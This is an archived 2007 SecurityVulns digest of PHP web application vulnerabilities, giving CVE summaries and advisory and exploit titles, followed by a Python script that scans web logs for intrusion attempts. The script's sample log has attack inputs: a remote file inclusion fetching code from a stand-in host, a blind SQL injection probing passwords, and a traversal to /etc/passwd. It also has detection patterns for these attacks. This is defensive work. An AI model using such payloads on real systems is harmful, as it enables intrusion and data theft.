Information Security


Daily digest of web application vulnerabilities (PHP, ASP, JSP, CGI, Perl)
Updated: April 5, 2007
Published: April 5, 2007
SecurityVulns ID: 7534
Type: remote
Severity: 5/10
Description: PHP injection (remote file inclusion), SQL injection, directory traversal, cross-site scripting, information leakage, etc.
Affected products: PHPMYNEWSLETTER : phpMyNewsletter 0.6
 FLEXPHPNEWS : Flexphpnews 0.0
 MYSPEACH : MySpeach 3.0
 WORDPRESS : WordPress 2.1
 MAPTOOLS : MapLab 2.2
 LITECMS : lite-cms 0.2
 EXV2 : eXV2 CMS 2.0
 PHPEXPLORATOR : phpexplorator 2.0
 IXONCMS : iXon-CMS 0.30
 KCMS : K-CMS 1.0
 MONKEYCMS : Monkey CMS 0.0
 PHPECHOCMS : phpechocms 2
 XOOPS : RM+Soft Gallery 1.0 module for Xoops
 XOOPS : myAlbum-P 2.0 module for Xoops
 XOOPS : debaser 0.92 module for Xoops
 XOOPS : Camportail 1.1 module for Xoops
 XOOPS : Kshop 1.17 module for Xoops
 XOOPS : Tiny Event 1.01 module for Xoops
 XOOPS : eCal 2.24 module for Xoops
 XOOPS : Zmagazine 1.0 module for Xoops
 XOOPS : XFsection 1.07 module for Xoops
 XOOPS : WF-Section 1.01 module for Xoops
 XOOPS : PopnupBlog 2.52 module for Xoops
 XOOPS : Rha7 Downloads 1.0 module for Xoops
 XOOPS : WF-Snippets 1.02 module for Xoops
 CYBOARDS : CyBoards PHP Lite 1.21
 PHPBB : mutant 0.9 module for phpBB
 AROUNDME : AROUNDMe 0.7
 RSPA : Really Simple PHP and Ajax 2007-03-23
 CWBPRO : CWB PRO 1.5
 BTSONDAGE : BT-Sondage 1.12
CVE: CVE-2007-1988 (Cross-site scripting (XSS) vulnerability in kernel/filters.inc.php in PHPEcho CMS 2.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter.)
 CVE-2007-1987 (** DISPUTED ** Multiple PHP remote file inclusion vulnerabilities in PHPEcho CMS 2.0 allow remote attackers to execute arbitrary PHP code via a URL in the (1) _plugin_file parameter to smarty/internals/core.load_pulgins.php or the (2) root_path parameter to index.php. NOTE: CVE disputes (1) because the inclusion occurs within a function that is not called during a direct request. CVE disputes (2) because root_path is defined in config.php before use.)
 CVE-2007-1986 (Multiple PHP remote file inclusion vulnerabilities in barnraiser AROUNDMe 0.7.7 allow remote attackers to execute arbitrary PHP code via a URL in the (1) language_path_core parameter to inc/core_profile.header.php, the (2) template_path_core parameter to template/barnraiser_01/maint_contact_view.tpl.php, and the (3) template_path parameter to template/barnraiser_01/default.tpl.php. NOTE: this issue might overlap CVE-2006-5533.)
 CVE-2007-1985 (Multiple PHP remote file inclusion vulnerabilities in phpexplorator.php in phpexplorator 2.0 allow remote attackers to execute arbitrary PHP code via a URL in the (1) cmd or (2) lang_path parameter.)
 CVE-2007-1984 (PHP remote file inclusion vulnerability in index.php in lite-cms 0.2.1 allows remote attackers to execute arbitrary PHP code via a URL in the inc parameter.)
 CVE-2007-1983 (PHP remote file inclusion vulnerability in include/default_header.php in Cyboards PHP Lite 1.21 allows remote attackers to execute arbitrary PHP code via a URL in the script_path parameter, a different vector than CVE-2006-2871.)
 CVE-2007-1982 (Multiple PHP remote file inclusion vulnerabilities in Really Simple PHP and Ajax (RSPA) 2007-03-23 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) __IncludeFilePHPClass, (2) __ClassPath, and (3) __class parameters to (a) rspa/framework/Controller_v5.php, and (b) rspa/framework/Controller_v4.php.)
 CVE-2007-1980 (SQL injection vulnerability in index.php in the Topliste 1.0 module for PHP-Fusion allows remote attackers to execute arbitrary SQL commands via the cid parameter.)
 CVE-2007-1979 (SQL injection vulnerability in index.php in the PopnupBlog 2.52 and earlier module for Xoops allows remote attackers to execute arbitrary SQL commands via the postid parameter, possibly involving the get_blogid_from_postid function in class/PopnupBlogUtils.php. NOTE: later versions such as 3.03 and 3.05 might also be affected.)
 CVE-2007-1978 (SQL injection vulnerability in index.php in the Arcade 1.00 module for PHP-Fusion allows remote attackers to execute arbitrary SQL commands via the cid parameter in a view_game_list action.)
 CVE-2007-1974 (SQL injection vulnerability in the getArticle function in class/wfsarticle.php in WF-Section (aka WF-Sections) 1.0.1, as used in Xoops modules such as (1) Zmagazine 1.0, (2) Happy Linux XFsection 1.07 and earlier, and possibly other modules, allows remote attackers to execute arbitrary SQL commands via the articleid parameter to print.php.)
 CVE-2007-1967 (** DISPUTED ** PHP remote file inclusion vulnerability in index.php in stat12 allows remote attackers to execute arbitrary PHP code via a URL in the langpath parameter. NOTE: this issue was published by an unreliable researcher, and there is little information to determine which product is actually affected. This is probably an invalid report based on analysis by CVE and a third party.)
 CVE-2007-1966 (Session fixation vulnerability in eXV2 CMS 2.0.4.3 and earlier allows remote attackers to hijack web sessions by setting the PHPSESSID cookie.)
 CVE-2007-1965 (Multiple cross-site scripting (XSS) vulnerabilities in eXV2 CMS 2.0.4.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the set_lang parameter to (1) archive.php, (2) article.php, (3) index.php, or (4) topics.php.)
 CVE-2007-1962 (SQL injection vulnerability in index.php in the WF-Snippets 1.02 and earlier module for XOOPS allows remote attackers to execute arbitrary SQL commands via the c parameter in a cat action.)
 CVE-2007-1961 (PHP remote file inclusion vulnerability in mutant_functions.php in the Mutant 0.9.2 portal for phpBB 2.2 allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.)
 CVE-2007-1960 (SQL injection vulnerability in visit.php in the Rha7 Downloads (rha7downloads) 1.0 module for XOOPS, and possibly other versions up to 1.10, allows remote attackers to execute arbitrary SQL commands via the lid parameter.)
 CVE-2007-1897 (SQL injection vulnerability in xmlrpc (xmlrpc.php) in WordPress 2.1.2, and probably earlier, allows remote authenticated users to execute arbitrary SQL commands via a string parameter value in an XML RPC mt.setPostCategories method call, related to the post_id variable.)
 CVE-2007-1896 (Directory traversal vulnerability in chat.php in Sky GUNNING MySpeach 3.0.7 and earlier allows remote attackers to include arbitrary local files via a .. (dot dot) and trailing %00 (NULL) in a my_ms[root] cookie.)
 CVE-2007-1895 (PHP remote file inclusion vulnerability in chat.php in Sky GUNNING MySpeach 3.0.7 and earlier, when used with PHP 5, allows remote attackers to execute arbitrary PHP code via an ftp URL in a my_ms[root] cookie, a different vector than CVE-2007-0491 and CVE-2006-4630.)
 CVE-2007-1894 (Cross-site scripting (XSS) vulnerability in wp-includes/general-template.php in WordPress before 20070309 allows remote attackers to inject arbitrary web script or HTML via the year parameter in the wp_title function.)
 CVE-2007-1893 (xmlrpc (xmlrpc.php) in WordPress 2.1.2, and probably earlier, allows remote authenticated users with the contributor role to bypass intended access restrictions and invoke the publish_posts functionality, which can be used to "publish a previously saved post.")
 CVE-2007-1851 (Multiple directory traversal vulnerabilities in Really Simple PHP and Ajax (RSPA) 2007-03-23 allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the __class parameter to (1) Controller_v4.php or (2) Controller_v5.php.)
 CVE-2007-1813 (SQL injection vulnerability in display.php in the eCal 2.24 and earlier module for Xoops allows remote attackers to execute arbitrary SQL commands via the katid parameter.)
 CVE-2007-1812 (PHP remote file inclusion vulnerability in utilitaires/gestion_sondage.php in BT-Sondage 112 allows remote attackers to execute arbitrary PHP code via a URL in the repertoire_visiteur parameter.)
 CVE-2007-1811 (SQL injection vulnerability in index.php in the Tiny Event (tinyevent) 1.01 and earlier module for Xoops allows remote attackers to execute arbitrary SQL commands via the id parameter in a show action.)
 CVE-2007-1810 (SQL injection vulnerability in product_details.php in the Kshop 1.17 and earlier module for Xoops allows remote attackers to execute arbitrary SQL commands via the id parameter.)
 CVE-2007-1809 (Multiple PHP remote file inclusion vulnerabilities in GraFX Company WebSite Builder (CWB) PRO 1.5 allow remote attackers to execute arbitrary PHP code via a URL in the INCLUDE_PATH parameter to (1) cls_headline_prod.php, (2) cls_listorders.php, or (3) cls_viewpastorders.php in include/, different vectors than CVE-2007-1513.)
 CVE-2007-1808 (SQL injection vulnerability in show.php in the Camportail 1.1 and earlier module for Xoops allows remote attackers to execute arbitrary SQL commands via the camid parameter in a showcam action.)
 CVE-2007-1807 (SQL injection vulnerability in modules/myalbum/viewcat.php in the myAlbum-P 2.0 and earlier module for Xoops allows remote attackers to execute arbitrary SQL commands via the cid parameter.)
 CVE-2007-1806 (SQL injection vulnerability in categos.php in the RM+Soft Gallery (rmgallery) 1.0 module for Xoops allows remote attackers to execute arbitrary SQL commands via the idcat parameter.)
 CVE-2007-1805 (SQL injection vulnerability in genre.php in the debaser 0.92 and earlier module for Xoops allows remote attackers to execute arbitrary SQL commands via the genreid parameter.)
Original text: Sumit Siddharth, [Full-disclosure] Wordpress 2.1.2 xmlrpc Vulnerabilities (06.04.2007)
 Crackers_Child, CWB PRO Version 1.5(INCLUDE_PATH)Remote File Include Vulnerabilites (05.04.2007)
 GolD_M, CWB PRO Version 1.5(INCLUDE_PATH)Remote File Include Vulnerabilites (05.04.2007)
 Dj7xpl, Flexphpnews 0.0.5 (news.php newsid) Remote SQL Injection Vulnerability (05.04.2007)
 ka0x, MapLab MS4W 2.2.1 Remote File Inclusion Vulnerability (05.04.2007)
 XORON, PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln (05.04.2007)
 XORON, PHP-FUSION topliste Module (cid) Remote SQL Injection Vuln (05.04.2007)
 Hamid Ebadi, RSPA Remote File Inclusion (05.04.2007)
 Xst3nZ, MySpeach <= 3.0.7 Remote/Local File Inclusion Vulnerability (05.04.2007)
 frog frog, phpMyNewsletter 0.6.10 (customize.php l) RFI Vulnerability: (05.04.2007)
 kezzap66345, AROUNDMe 0.7.7 Multiple Remote File Inclusion Vulnerabilities (05.04.2007)
 the_3dit0r_(at)_yahoo.com, MyBlog: PHP and MySQL Blog/CMS software Remote File Include Vulnerabilitiy (05.04.2007)
 the_3dit0r_(at)_yahoo.com, MyBlog: PHP and MySQL Blog/CMS software Cross-Site Scripting Vulnerabilitiy (05.04.2007)
 the_3dit0r_(at)_yahoo.com, phpechocms2 Remote File Include Vulnerabilities (05.04.2007)
 the_3dit0r_(at)_yahoo.com, phpechocms v.2 Cross-Site Scripting Vulnerabilitiy (05.04.2007)
 the_3dit0r_(at)_yahoo.com, Monkey CMS v0.0.3 Remote File Include Vulnerabilitiy (05.04.2007)
 the_3dit0r_(at)_yahoo.com, K-CMS v1.0 Remote File Include Vulnerabilities (05.04.2007)
 the_3dit0r_(at)_yahoo.com, iXon_CMS 0.30 Remote File Include Vulnerabilities (05.04.2007)
 RaeD Hasadya, Remot File Include In phpexplorator_2_0 (05.04.2007)
 SecurityAudit_(at)_majorsecurity.de, [MajorSecurity Advisory #38]eXV2 CMS - Session fixation and Cross-Site-Scripting Issues (05.04.2007)
 the_3dit0r_(at)_yahoo.com, lite-cms-0.2.1 Remote File Include Vulnerabilities (05.04.2007)
 RaeD Hasadya, Remote File Include In Script stat12 (05.04.2007)
Files: XOOPS Module RM+Soft Gallery 1.0(categos.php) BLIND SQL Injection Exploit
 XOOPS Module myAlbum-P <= 2.0 (cid) Remote BLIND SQL Injection Exploit
 XOOPS Module debaser <= 0.92(genre.php) BLIND SQL Injection Exploit
 XOOPS Module Camportail <= 1.1 (camid) Remote BLIND SQL Injection Exploit
 XOOPS Module Kshop <= 1.17 (id) Remote BLIND SQL Injection Exploit
 XOOPS Module Tiny Event <= 1.01 (id) Remote BLIND SQL Injection Exploit
 XOOPS Module eCal 2.24 <= (display.php) Remote BLIND SQL Injection Exploit
 XOOPS Module Zmagazine 1.0 (print.php) Remote BLIND SQL Injection Exploit
 XOOPS Module XFsection <= 1.07 (articleid) BLIND SQL Injection Exploit
 XOOPS Module WF-Section <= 1.01 (articleid) Remote BLIND SQL Injection Exploit
 XOOPS Module PopnupBlog <= 2.52 (postid) BLIND SQL Injection Exploit
 XOOPS Module Rha7 Downloads 1.0 (visit.php) Remote BLIND SQL Injection Exploit
 XOOPS Module WF-Snippets <= 1.02 (c) BLIND SQL Injection Exploit
 CyBoards PHP Lite 1.21 (script_path) Remote File Include Exploit
 phpBB mutant 0.9.2 (phpbb_root_path) Remote File Inclusion Exploit
 Wordpress 2.1.2 SQL Injection POC
 WinMail Server 4.4 build 1124 (WebMail) remote add new Super User exploit
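Nearly every entry in this digest falls into three classes: a PHP remote file inclusion triggered by a URL in a request parameter (including an ftp:// URL in a cookie, CVE-2007-1895), directory traversal with a trailing %00 in a cookie (CVE-2007-1896), and SQL injection in integer "id"-style parameters of XOOPS and PHP-Fusion modules. The script below is a log-triage helper for exactly those vectors, written for this page as an added example; it is not code from SecurityVulns or from any product listed above. It assumes an Apache combined log extended with one trailing quoted field carrying the Cookie header (stock combined logs do not record cookies, so cookie-borne vectors stay invisible without that change), and the log lines, addresses and payloads are constructed to mirror CVE-2007-1984, CVE-2007-1810 and CVE-2007-1896.

```python
"""Log-triage helper for the attack classes in this digest: PHP remote file
inclusion via a URL in a parameter, directory traversal with a trailing NUL
byte, and SQL injection in integer "id"-style parameters. Added example; not
code from SecurityVulns or any product listed above. Log lines are constructed."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumed log format: Apache combined log plus one trailing quoted field for
# the Cookie header (e.g. LogFormat "... \"%{Cookie}i\"").
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "[^"]*"(?: "(?P<cookie>[^"]*)")?'
)

URL_SCHEME = re.compile(r'^(?:https?|ftp)://', re.I)  # ftp:// per CVE-2007-1895
TRAVERSAL = re.compile(r'\.\.[/\\]')
SQL_TOKEN = re.compile(r"(?:'|--|/\*|\b(?:and|or|union|select|sleep|benchmark)\b)", re.I)
# Parameter names taken from the CVE entries above; the SQL check runs only on
# these (or on names ending in "id") so free-text search fields do not alert.
ID_PARAMS = {'id', 'cid', 'lid', 'postid', 'articleid', 'katid', 'camid',
             'genreid', 'idcat', 'newsid', 'c', 'post_id'}


def classify(name, value):
    """Return the attack classes a single decoded parameter value matches."""
    kinds = []
    if URL_SCHEME.match(value):
        kinds.append('rfi')
    if TRAVERSAL.search(value) or '\x00' in value:
        kinds.append('traversal')
    base = name.split(':', 1)[-1].lower()  # strip the "cookie:" prefix
    if (base in ID_PARAMS or base.endswith('id')) and not value.isdigit() \
            and SQL_TOKEN.search(value):
        kinds.append('sqli')
    return kinds


def parameters(match):
    """Decoded (name, value) pairs from the query string and Cookie header."""
    url = urlsplit(match['target'])
    params = parse_qsl(url.query, keep_blank_values=True)  # %00 -> '\x00'
    if match['cookie']:
        for part in match['cookie'].split(';'):
            name, _, raw = part.strip().partition('=')
            params.append(('cookie:' + name, unquote(raw)))
    return url.path, params


def scan(log_text):
    """Return one finding dict per (request, parameter, attack class)."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        path, params = parameters(m)
        for name, value in params:
            for kind in classify(name, value):
                findings.append({'ip': m['ip'], 'path': path,
                                 'param': name, 'kind': kind, 'value': value})
    return findings


# Constructed sample traffic (RFC 5737 addresses), shaped after CVE-2007-1984,
# CVE-2007-1810 and CVE-2007-1896; the last line is a benign request.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Apr/2007:10:01:02 +0400] "GET /lite-cms/index.php?inc=http://198.51.100.9/c.txt? HTTP/1.1" 200 512 "-" "Mozilla"
203.0.113.5 - - [05/Apr/2007:10:01:03 +0400] "GET /xoops/modules/kshop/product_details.php?id=3%20AND%20SUBSTRING(pass,1,1)=0x61 HTTP/1.1" 200 2048 "-" "Mozilla"
203.0.113.5 - - [05/Apr/2007:10:01:04 +0400] "GET /myspeach/chat.php HTTP/1.1" 200 300 "-" "Mozilla" "my_ms[root]=../../../../etc/passwd%00"
203.0.113.7 - - [05/Apr/2007:10:02:00 +0400] "GET /xoops/modules/kshop/product_details.php?id=3 HTTP/1.1" 200 2048 "-" "Mozilla"
"""

if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f"{f['ip']} {f['kind']:9} {f['path']} {f['param']}={f['value']!r}")
```

Run it directly to print the three findings from the sample, or pass a real log with scan(open(path).read()). Values are URL-decoded once, which is what PHP does for $_GET and $_COOKIE; a double-encoded payload will slip past the scheme and traversal checks, so decode a second time if the target application does. The AND/OR keyword test is deliberately restricted to id-like parameter names: on a free-text search field it would fire on ordinary English, while on a parameter that should only ever be an integer any non-digit content is already suspicious.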

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod